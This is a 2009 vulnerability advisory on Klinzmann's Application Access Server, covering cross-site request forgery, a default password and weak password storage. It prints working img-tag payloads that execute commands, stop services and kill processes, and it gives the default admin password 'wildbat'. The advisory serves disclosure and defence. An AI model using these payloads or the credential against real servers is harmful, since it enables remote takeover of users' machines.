Klinzmann A-A-S XSRF / Code Execution

`Syhunt: A-A-S (Application Access Server) Multiple Security Vulnerabilities  
  
Advisory-ID: 200905111  
Discovery Date: 3.23.2009  
Release Date: 5.11.2009  
Affected Applications: A-A-S 2.0.48 and possibly older versions  
Class: XSRF (Cross Site Request Forgery) Arbitrary Command Execution,   
Undocumented Default Password, Insecure Password Storage  
Status: Vendor informed. No fix available  
Vendor: Klinzmann  
Vendor URL: http://www.klinzmann.name/a-a-s/index_en.html  
Advisory URL: http://www.syhunt.com/advisories/?id=aas-multiple  
  
The Common Vulnerabilities and Exposures (CVE) project has assigned the   
following CVEs to these vulnerabilities:  
* CVE-2009-1464 - index.aas job parameter XSRF Arbitrary Command   
Execution Vulnerability  
* CVE-2009-1465 - Default Admin Password Vulnerability  
* CVE-2009-1466 - Insecure Password and Port Keyword Storage Vulnerability  
  
----------------------------------------------------------------  
  
Overview:  
The Application Access Server is a popular freeware remote   
administration tool that allows to start and stop applications or   
services over the Internet using a Web-based client. It also allows to   
uninstall applications, remotely shutdown and retrieve various   
information about the current system the server is running on. It claims   
to be able to "black list" aggressors and run in "Stealth mode", thus   
evading port scanners.  
  
The A-A-S server also supports DynDNS.org, which allows aliasing the   
server IP to a static hostname.  
  
Description:  
The Application Access Server is vulnerable to extremely dangerous XSRF   
(Cross Site Request Forgery) attacks. A remote attacker can use the XSRF   
flaw to take control over the system running the A-A-S server. The issue   
is triggered when a web page containing a malicious JavaScript code is   
viewed. Such malicious code can automatically make requests to the AAS   
server on the user's behalf.  
  
Two additional vulnerabilities affect the Application Access Server: an   
undocumented default password and insecure password storage. Technical   
details are included below.  
  
----------------------------------------------------------------  
  
Details:  
1) index.aas job parameter XSRF (Cross Site Request Forgery)  
Arbitrary Command Execution  
  
Example 1 - Arbitrary Command Execution / File Upload  
See: http://www.syhunt.com/advisories/aashack.txt  
  
This exploit demonstration code automatically makes sequential requests   
to the AAS server on the user's behalf (if the user is logged in to the   
server), disabling undesired services, uploading and launching a file on   
the target machine. It has been successfully tested on IE 7.0 and   
Firefox 3.08. Should work on any browser that has javascript enabled  
  
Please note that the server's security features like host access list   
and port modes (Silent or Stealth) will not protect against the XSRF   
flaw if enabled.  
  
Example 2 - Arbitrary Command Execution:  
<img src="http://[AAS IP or DYNDNS   
HOST]:6262/index.aas?job=command&action=[command]">  
This for example would launch the Calculator:  
/index.aas?job=command&action=calc.exe  
  
Example 3 - Stopping Services:  
<img src="http://[AAS IP or DYNDNS   
HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">  
This for example would disable Automatic Updates:  
/index.aas?job=setservice&action=stop&select=wuauserv  
  
Example 4 - Killing Processes:  
<img src="http://[AAS IP or DYNDNS   
HOST]:6262/index.aas?job=killprocess&select=[exename]">  
Example:  
/index.aas?job=killprocess&select=notepad.exe  
  
Additional commands are available via the job parameter.  
  
2) Default Admin Password Vulnerability  
By default, A-A-S installs with a default admin account. The account has   
an undocumented default password of "wildbat" and all the security   
rights enabled. These default rights allow to execute any commands on   
the machine.  
  
3) Insecure Password and Port Keyword Storage Vulnerability  
A-A-S passwords and the port keyword (used to connect to the server when   
in Stealth or Silent mode) are stored as a base64 string in the   
"aas.ini" file, contained in the A-A-S install directory, with no   
encryption at all. This allows the password or port keyword to be easily   
retrieved.  
  
----------------------------------------------------------------  
  
Vulnerability Status:  
The vendor was contacted, immediately responded and will be releasing a   
fix soon.  
  
As a workaround to the XSRF vulnerability, the vendor recommends   
limiting the security rights in the user settings screen for each user:  
- Disable the "Allow own command" option (command execution will not be   
possible after this option is disabled).  
- If possible also disable the "Enable kill process", "Start/Stop   
service" and "Run application" rights.  
  
Avoid completely navigating to other websites while logged in to the   
Application Access Server.  
  
Never start the server using its default settings (as explained above   
machines running a default A-A-S may be easily compromised). Change the   
password of the admin account first.  
  
----------------------------------------------------------------  
  
Credit:  
Felipe Aragon  
Syhunt Security Research Team, www.syhunt.com  
  
---  
  
Copyright © 2009 Syhunt Cyber Security Company  
  
Disclaimer:  
The information in this advisory is provided "as is" without warranty of   
any kind. Details provided are strictly for educational and defensive   
purposes.  
  
Syhunt is not liable for any damages caused by direct or indirect use of   
the information provided by this advisory.  
`